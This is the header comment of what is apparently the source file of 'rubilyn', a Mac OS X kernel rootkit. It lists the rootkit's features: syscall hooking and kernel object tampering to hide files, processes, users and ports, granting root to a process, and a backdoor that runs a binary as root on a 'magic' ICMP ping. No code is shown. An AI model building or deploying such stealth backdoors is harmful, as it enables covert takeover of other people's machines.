rubilyn

/*
                        .o8        o8o  oooo
                       "888        `"'  `888
  oooo d8b oooo  oooo   888oooo.  oooo   888  oooo    ooo ooo. .oo.
  `888""8P `888  `888   d88' `88b `888   888   `88.  .8'  `888P"Y88b
   888      888   888   888   888  888   888    `88..8'    888   888
   888      888   888   888   888  888   888     `888'     888   888
  d888b     `V88V"V8P'  `Y8bod8P' o888o o888o     .8'     o888o o888o
                                            .o..P' HARDCORE EST. 1983
                                            `Y8P'

  64-bit Mac OS-X kernel rootkit that uses no hardcoded addresses
  to hook the BSD subsystem on OS-X Lion and below. It uses a
  combination of syscall hooking and DKOM to hide activity on a
  host. Resolving symbols by string lookup no longer works on
  Mountain Lion, because the symtab is destroyed during load;
  this code is portable across Lion and below, but the hooking
  requires re-working for Mountain Lion.

  Features:
  * works across multiple kernel versions (tested 11.0.0+)
  * give root privileges to a pid
  * hide files / folders
  * hide a process
  * hide a user from 'who'/'w'
  * hide a network port from netstat
  * sysctl interface for userland control
  * execute a binary with root privileges via magic ICMP ping

  greetingz to #nullsecurity crew, snare, dino, nemo, thegrugq,
  piotr & friendz!

  -- prdelka
*/